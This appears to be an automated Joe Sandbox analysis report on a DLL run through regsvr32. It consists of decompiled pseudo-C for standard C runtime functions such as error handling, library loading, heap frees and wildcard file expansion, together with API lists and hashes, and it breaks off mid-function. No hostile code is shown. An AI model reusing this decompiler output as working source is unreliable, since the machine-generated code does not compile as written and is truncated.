0x6f6d0cac
0x6f6d0cac
0x6f6d0cac
0x6f6d0cac
0x6f6d0cbe
0x6f6d0cc0
0x6f6d0cc1
0x6f6d0cc2
0x6f6d0ccc

APIs

GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6F6D0969
__fassign.LIBCMT ref: 6F6D0B4E
__fassign.LIBCMT ref: 6F6D0B6B
WriteFile.KERNEL32(?,6F6CE286,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6F6D0BB3
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6F6D0BF3
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6F6D0C9B

Memory Dump Source

Source File: 00000019.00000002.665782450.000000006F6C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F6C0000, based on PE: true

Associated: 00000019.00000002.665775734.000000006F6C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665829052.000000006F6D5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665868726.000000006F6DC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665891961.000000006F6DE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6f6c0000_regsvr32.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: 7515540adaafd7bec2605d4d558f22b0434471ff88e994bdc1b17588b706e9ea
Instruction ID: d587f1c7fefb63272b43528a3167df86f46ff55348befc56739f04e5182acb38
Opcode Fuzzy Hash: 7515540adaafd7bec2605d4d558f22b0434471ff88e994bdc1b17588b706e9ea
Instruction Fuzzy Hash: 80C1AC75D00298AFDF04CFE8C9809EDBBB5EF49318F28516AE855BB245D731A942CF60

Uniqueness

Uniqueness Score: -1.00%

Function 6F6CAD94 Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E6F6CAD94(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x6f6dc030 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E6F6CBF60(_t13, __eflags,  *0x6f6dc030);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E6F6CBF9B(_t14, __eflags,  *0x6f6dc030, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E6F6CD58B();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E6F6CBF9B(_t18, __eflags,  *0x6f6dc030, 0);
								} else {
									_t8 = E6F6CBF9B(_t18, __eflags,  *0x6f6dc030, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E6F6CC2B0(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x6f6cad94
0x6f6cad9b
0x6f6cadae
0x6f6cadb5
0x6f6cadb7
0x6f6cadb8
0x6f6cadbb
0x6f6cadd4
0x6f6cadd4
0x6f6cadbd
0x6f6cadbd
0x6f6cadbf
0x6f6cadc9
0x6f6cadd0
0x6f6cadd2
0x6f6cadd9
0x6f6cade2
0x6f6cade5
0x6f6cade6
0x6f6cade8
0x6f6cadfc
0x6f6cadfc
0x6f6cae05
0x6f6cadea
0x6f6cadf1
0x6f6cadf7
0x6f6cadf8
0x6f6cadfa
0x6f6cae0e
0x6f6cae10
0x6f6cae10
0x00000000
0x00000000
0x00000000
0x6f6cadfa
0x6f6cae13
0x00000000
0x00000000
0x00000000
0x6f6cadd2
0x6f6cadbf
0x6f6cae1b
0x6f6cae25
0x6f6cad9d
0x6f6cad9f
0x6f6cad9f

APIs

GetLastError.KERNEL32(00000001,?,6F6CA952,6F6C8F01,6F6C92CE,?,6F6C9506,?,00000001,?,?,00000001,?,6F6DA618,0000000C,6F6C95FF), ref: 6F6CADA2
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6F6CADB0
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6F6CADC9
SetLastError.KERNEL32(00000000,6F6C9506,?,00000001,?,?,00000001,?,6F6DA618,0000000C,6F6C95FF,?,00000001,?), ref: 6F6CAE1B

Memory Dump Source

Source File: 00000019.00000002.665782450.000000006F6C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F6C0000, based on PE: true

Associated: 00000019.00000002.665775734.000000006F6C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665829052.000000006F6D5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665868726.000000006F6DC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665891961.000000006F6DE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6f6c0000_regsvr32.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 636491a359db8f89de12dff88d85c2cc848fb98b2fafacbda95f5fd42be90a92
Instruction ID: 755b4010873c6792a06844bcd68bf6103e40fd8214357137bb9ff9bdd5a70fc6
Opcode Fuzzy Hash: 636491a359db8f89de12dff88d85c2cc848fb98b2fafacbda95f5fd42be90a92
Instruction Fuzzy Hash: 2201203251DB255EE7001AB65C949573774EF03BBE730033EF5A1461D1EF129C21A58A

Uniqueness

Uniqueness Score: -1.00%

Function 6F6CF217 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F6CF217(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E6F6CFCA5(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E6F6CFCA5(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E6F6CD437(GetLastError());
									_t17 =  *((intOrPtr*)(E6F6CD46D(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E6F6CF2DE(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E6F6CD437(GetLastError());
						_t17 =  *((intOrPtr*)(E6F6CD46D(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E6F6CF2DE(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E6F6CF305(_a8);
				return 0;
			}

0x6f6cf21d
0x6f6cf222
0x6f6cf236
0x6f6cf239
0x6f6cf26b
0x6f6cf273
0x6f6cf275
0x6f6cf28e
0x6f6cf291
0x6f6cf294
0x6f6cf2a2
0x6f6cf2b1
0x6f6cf2b9
0x6f6cf2bb
0x6f6cf2d4
0x6f6cf2d7
0x6f6cf2d7
0x6f6cf2bd
0x6f6cf2c4
0x6f6cf2cf
0x6f6cf2cf
0x6f6cf2d9
0x6f6cf2da
0x00000000
0x6f6cf2da
0x6f6cf299
0x6f6cf29e
0x6f6cf2a0
0x00000000
0x00000000
0x00000000
0x6f6cf2a0
0x6f6cf27e
0x6f6cf289
0x00000000
0x6f6cf289
0x6f6cf23b
0x6f6cf23e
0x6f6cf241
0x6f6cf254
0x6f6cf257
0x6f6cf259
0x6f6cf25b
0x00000000
0x6f6cf25b
0x6f6cf247
0x6f6cf24c
0x6f6cf24e
0x00000000
0x00000000
0x00000000
0x6f6cf24e
0x6f6cf227
0x00000000

Strings

C:\Windows\SysWOW64\regsvr32.exe, xrefs: 6F6CF21C

Memory Dump Source

Source File: 00000019.00000002.665782450.000000006F6C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F6C0000, based on PE: true

Associated: 00000019.00000002.665775734.000000006F6C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665829052.000000006F6D5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665868726.000000006F6DC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665891961.000000006F6DE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6f6c0000_regsvr32.jbxd

Similarity

API ID:
String ID: C:\Windows\SysWOW64\regsvr32.exe
API String ID: 0-3922119987
Opcode ID: 71756a79a5e39494e6d21f88cb23866787d9ca7d511b44671a1f40953ce55a0e
Instruction ID: eb7ea2e050e32098d2caeb2be9f75caba1136e75c9484e395b3bd706309d4978
Opcode Fuzzy Hash: 71756a79a5e39494e6d21f88cb23866787d9ca7d511b44671a1f40953ce55a0e
Instruction Fuzzy Hash: 9F218E75604605AFE7009FF5DE8099BB7ADEF053687108614F9A59B580EB24FC41C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 6F6CBE07 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6F6CBE07(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0x6f6dd3ec + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x6f6d5e38 + _t11 * 4);
						_v8 = _t12;
						_t29 = LoadLibraryExW(_t12, 0, 0x800);
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E6F6CD618(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}

0x6f6cbe0e
0x6f6cbe82
0x6f6cbe13
0x6f6cbe15
0x6f6cbe1c
0x6f6cbe20
0x6f6cbe29
0x6f6cbe38
0x6f6cbe41
0x6f6cbe45
0x6f6cbe8e
0x6f6cbe90
0x6f6cbe94
0x6f6cbe97
0x6f6cbe97
0x6f6cbe9d
0x6f6cbe9d
0x6f6cbe89
0x6f6cbe8d
0x6f6cbe8d
0x6f6cbe47
0x6f6cbe50
0x6f6cbe7a
0x6f6cbe7d
0x6f6cbe7f
0x6f6cbe7f
0x00000000
0x6f6cbe7f
0x6f6cbe52
0x6f6cbe5d
0x6f6cbe62
0x6f6cbe67
0x00000000
0x00000000
0x6f6cbe6e
0x6f6cbe74
0x6f6cbe78
0x00000000
0x00000000
0x00000000
0x6f6cbe78
0x6f6cbe25
0x00000000
0x00000000
0x00000000
0x6f6cbe27
0x6f6cbe87
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,?,6F6CBEC8,00000000,?,00000001,00000000,?,6F6CBF3F,00000001,FlsFree,6F6D5EF4,FlsFree,00000000), ref: 6F6CBE97

Strings

api-ms-, xrefs: 6F6CBE57

Memory Dump Source

Source File: 00000019.00000002.665782450.000000006F6C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F6C0000, based on PE: true

Associated: 00000019.00000002.665775734.000000006F6C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665829052.000000006F6D5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665868726.000000006F6DC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665891961.000000006F6DE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6f6c0000_regsvr32.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: cfebee319fb71c8a327fa22ce2cb9b91552c425f729c42aa8631b5158adc963b
Instruction ID: 0abf364a883d5db80f503313f888e0d294122aa0adf42a6b198a094f42090016
Opcode Fuzzy Hash: cfebee319fb71c8a327fa22ce2cb9b91552c425f729c42aa8631b5158adc963b
Instruction Fuzzy Hash: 6A118A31D45A31ABDF115A6D8C4578A77A4EF06BF1F150211FA94EB680D760FD0086D6

Uniqueness

Uniqueness Score: -1.00%

Function 6F6CC8EA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E6F6CC8EA(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x6f6d51b8(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x6f6cc8f0
0x6f6cc8f4
0x6f6cc8ff
0x6f6cc907
0x6f6cc912
0x6f6cc918
0x6f6cc91c
0x6f6cc923
0x6f6cc929
0x6f6cc929
0x6f6cc92b
0x6f6cc930
0x00000000
0x6f6cc935
0x6f6cc93c

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6F6CC89C,?,?,6F6CC864,?,00000001,?), ref: 6F6CC8FF
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6F6CC912
FreeLibrary.KERNEL32(00000000,?,?,6F6CC89C,?,?,6F6CC864,?,00000001,?), ref: 6F6CC935

Strings

CorExitProcess, xrefs: 6F6CC90A
mscoree.dll, xrefs: 6F6CC8F8

Memory Dump Source

Source File: 00000019.00000002.665782450.000000006F6C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F6C0000, based on PE: true

Associated: 00000019.00000002.665775734.000000006F6C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665829052.000000006F6D5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665868726.000000006F6DC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665891961.000000006F6DE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6f6c0000_regsvr32.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 2845f9498f6eaf6fdc1d39335372062f5c093c6091f5c825876a67f0d3219fac
Instruction ID: bb9c31123b697b292356340995032ec3f8a2cf45f236567565a1c0a74789cfa6
Opcode Fuzzy Hash: 2845f9498f6eaf6fdc1d39335372062f5c093c6091f5c825876a67f0d3219fac
Instruction Fuzzy Hash: 66F08C30901518FBDF11AB96CD19BDE7BA9EB06765F000061F842A2150CB308E10DA91

Uniqueness

Uniqueness Score: -1.00%

Function 6F6D190B Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6F6D190B(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x6f6dc708; // 0x6f6dc758
					if(_t23 != 0) {
						E6F6CDC0E(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x6f6dc70c; // 0x6f6dd9f4
					if(_t24 != 0) {
						E6F6CDC0E(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x6f6dc710; // 0x6f6dd9f4
					if(_t25 != 0) {
						E6F6CDC0E(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x6f6dc738; // 0x6f6dc75c
					if(_t26 != 0) {
						E6F6CDC0E(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x6f6dc73c; // 0x6f6dd9f8
					if(_t27 != 0) {
						return E6F6CDC0E(_t6);
					}
				}
				return _t6;
			}

0x6f6d1911
0x6f6d1916
0x6f6d191a
0x6f6d1920
0x6f6d1923
0x6f6d1928
0x6f6d192c
0x6f6d1932
0x6f6d1935
0x6f6d193a
0x6f6d193e
0x6f6d1944
0x6f6d1947
0x6f6d194c
0x6f6d1950
0x6f6d1956
0x6f6d1959
0x6f6d195e
0x6f6d195f
0x6f6d1962
0x6f6d1968
0x00000000
0x6f6d1970
0x6f6d1968
0x6f6d1973

APIs

_free.LIBCMT ref: 6F6D1923

Part of subcall function 6F6CDC0E: HeapFree.KERNEL32(00000000,00000000,?,6F6D199E,?,00000000,?,?,?,6F6D19C5,?,00000007,?,?,6F6D04FE,?), ref: 6F6CDC24
Part of subcall function 6F6CDC0E: GetLastError.KERNEL32(?,?,6F6D199E,?,00000000,?,?,?,6F6D19C5,?,00000007,?,?,6F6D04FE,?,?), ref: 6F6CDC36

_free.LIBCMT ref: 6F6D1935
_free.LIBCMT ref: 6F6D1947
_free.LIBCMT ref: 6F6D1959
_free.LIBCMT ref: 6F6D196B

Memory Dump Source

Source File: 00000019.00000002.665782450.000000006F6C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F6C0000, based on PE: true

Associated: 00000019.00000002.665775734.000000006F6C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665829052.000000006F6D5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665868726.000000006F6DC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665891961.000000006F6DE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6f6c0000_regsvr32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b636a6821413fcfb0614ae249939d2c14c1db8fd3893812aec8992ce23d45dd5
Instruction ID: a7a252a0ebe4d0cf2f53ae12801348215cb4c83e12687fefc1bffbaae2aa25d9
Opcode Fuzzy Hash: b636a6821413fcfb0614ae249939d2c14c1db8fd3893812aec8992ce23d45dd5
Instruction Fuzzy Hash: E9F036B154474897AB10DB69D6C1C5773FEEA0576C7500806F175DB541C7B0F8818695

Uniqueness

Uniqueness Score: -1.00%

Function 6F6CEB9B Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E6F6CEB9B(void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				void* __ebx;
				void* __edi;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				intOrPtr* _t196;
				signed int _t199;
				intOrPtr _t204;
				signed int _t206;
				signed int _t209;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int* _t219;
				signed int _t222;
				void* _t225;
				union _FINDEX_INFO_LEVELS _t226;
				void* _t227;
				intOrPtr _t229;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				intOrPtr* _t239;
				signed int _t241;
				intOrPtr* _t244;
				signed int _t249;
				signed int _t255;
				signed int _t257;
				signed int _t263;
				intOrPtr* _t264;
				signed int _t272;
				signed int _t274;
				intOrPtr* _t275;
				void* _t277;
				signed int _t280;
				signed int _t283;
				signed int _t285;
				intOrPtr _t287;
				void* _t288;
				signed int* _t292;
				signed int _t293;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				void* _t300;
				void* _t301;
				signed int _t302;
				void* _t306;
				signed int _t307;
				void* _t308;
				void* _t309;
				void* _t310;
				signed int _t311;
				void* _t312;
				void* _t313;

				_t131 = _a8;
				_t309 = _t308 - 0x28;
				_push(__esi);
				_t317 = _t131;
				if(_t131 != 0) {
					_t292 = _a4;
					_t222 = 0;
					 *_t131 = 0;
					_t283 = 0;
					_t132 =  *_t292;
					_t232 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t222;
						_t134 = _t232 - _t283;
						_t293 = _t283;
						_v12 = _t293;
						_t271 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t232 - _t293;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t295 =  !_t293 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t295;
						if(_t295 != 0) {
							_t213 = _t283;
							_t280 = _t222;
							do {
								_t264 =  *_t213;
								_t20 = _t264 + 1; // 0x1
								_v20 = _t20;
								do {
									_t215 =  *_t264;
									_t264 = _t264 + 1;
									__eflags = _t215;
								} while (_t215 != 0);
								_t222 = _t222 + 1 + _t264 - _v20;
								_t213 = _v12 + 4;
								_t280 = _t280 + 1;
								_v12 = _t213;
								__eflags = _t280 - _t295;
							} while (_t280 != _t295);
							_t271 = _v16;
							_v8 = _t222;
							_t222 = 0;
							__eflags = 0;
						}
						_t296 = E6F6CCC22(_t136, _t271, _v8, 1);
						_t310 = _t309 + 0xc;
						__eflags = _t296;
						if(_t296 != 0) {
							_v12 = _t283;
							_t139 = _t296 + _v16 * 4;
							_t233 = _t139;
							_v28 = _t139;
							_t140 = _t283;
							_v16 = _t233;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t222;
								 *_a8 = _t296;
								_t297 = _t222;
								goto L25;
							} else {
								_t274 = _t296 - _t283;
								__eflags = _t274;
								_v32 = _t274;
								do {
									_t150 =  *_t140;
									_t275 = _t150;
									_v24 = _t150;
									_v20 = _t275 + 1;
									do {
										_t152 =  *_t275;
										_t275 = _t275 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t275 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E6F6D2161(_t233, _v28 - _t233 + _v8, _v24);
									_t310 = _t310 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										E6F6CC27C();
										asm("int3");
										_t306 = _t310;
										_push(_t233);
										_t239 = _v72;
										_t65 = _t239 + 1; // 0x1
										_t277 = _t65;
										do {
											_t159 =  *_t239;
											_t239 = _t239 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t283);
										_t285 = _a8;
										_t241 = _t239 - _t277 + 1;
										_v12 = _t241;
										__eflags = _t241 -  !_t285;
										if(_t241 <=  !_t285) {
											_push(_t222);
											_push(_t296);
											_t68 = _t285 + 1; // 0x1
											_t225 = _t68 + _t241;
											_t300 = E6F6CDC48(_t225, 1);
											__eflags = _t285;
											if(_t285 == 0) {
												L40:
												_push(_v12);
												_t225 = _t225 - _t285;
												_t164 = E6F6D2161(_t300 + _t285, _t225, _v0);
												_t311 = _t310 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t229 = _a12;
													_t206 = E6F6CF185(_t229);
													_v12 = _t206;
													__eflags = _t206;
													if(_t206 == 0) {
														 *( *(_t229 + 4)) = _t300;
														_t302 = 0;
														_t77 = _t229 + 4;
														 *_t77 =  *(_t229 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E6F6CDC0E(_t300);
														_t302 = _v12;
													}
													E6F6CDC0E(0);
													_t209 = _t302;
													goto L37;
												}
											} else {
												_push(_t285);
												_t211 = E6F6D2161(_t300, _t225, _a4);
												_t311 = _t310 + 0x10;
												__eflags = _t211;
												if(_t211 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E6F6CC27C();
													asm("int3");
													_push(_t306);
													_t307 = _t311;
													_t312 = _t311 - 0x298;
													_t166 =  *0x6f6dc024; // 0x15485920
													_v124 = _t166 ^ _t307;
													_t244 = _v108;
													_t278 = _v104;
													_push(_t225);
													_push(0);
													_t287 = _v112;
													_v724 = _t278;
													__eflags = _t244 - _t287;
													if(_t244 != _t287) {
														while(1) {
															_t204 =  *_t244;
															__eflags = _t204 - 0x2f;
															if(_t204 == 0x2f) {
																break;
															}
															__eflags = _t204 - 0x5c;
															if(_t204 != 0x5c) {
																__eflags = _t204 - 0x3a;
																if(_t204 != 0x3a) {
																	_t244 = E6F6D21B0(_t287, _t244);
																	__eflags = _t244 - _t287;
																	if(_t244 != _t287) {
																		continue;
																	}
																}
															}
															break;
														}
														_t278 = _v616;
													}
													_t168 =  *_t244;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L56:
														_t226 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L59:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L59;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L59;
																}
															}
														}
														_v676 = _t226;
														_v672 = _t226;
														_push(_t300);
														asm("sbb eax, eax");
														_v668 = _t226;
														_v664 = _t226;
														_v644 =  ~(_t169 & 0x000000ff) & _t244 - _t287 + 0x00000001;
														_v660 = _t226;
														_v656 = _t226;
														_t175 = E6F6CEB7E(_t244 - _t287 + 1, _t287,  &_v676, E6F6CF092(_t278, __eflags));
														_t313 = _t312 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t226,  &_v608, _t226, _t226, _t226);
														_t301 = _t179;
														__eflags = _t301 - 0xffffffff;
														if(_t301 != 0xffffffff) {
															_t249 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t249;
															_v648 = _t249 >> 2;
															do {
																_v640 = _t226;
																_v636 = _t226;
																_v632 = _t226;
																_v628 = _t226;
																_v624 = _t226;
																_v620 = _t226;
																_t185 = E6F6CEAAF( &(_v608.cFileName),  &_v640,  &_v609, E6F6CF092(_t278, __eflags));
																_t313 = _t313 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L67:
																	_push(_v616);
																	_push(_v644);
																	_push(_t287);
																	_push(_t188);
																	L33();
																	_t313 = _t313 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t226;
																		if(_v620 != _t226) {
																			E6F6CDC0E(_v632);
																			_t188 = _v652;
																		}
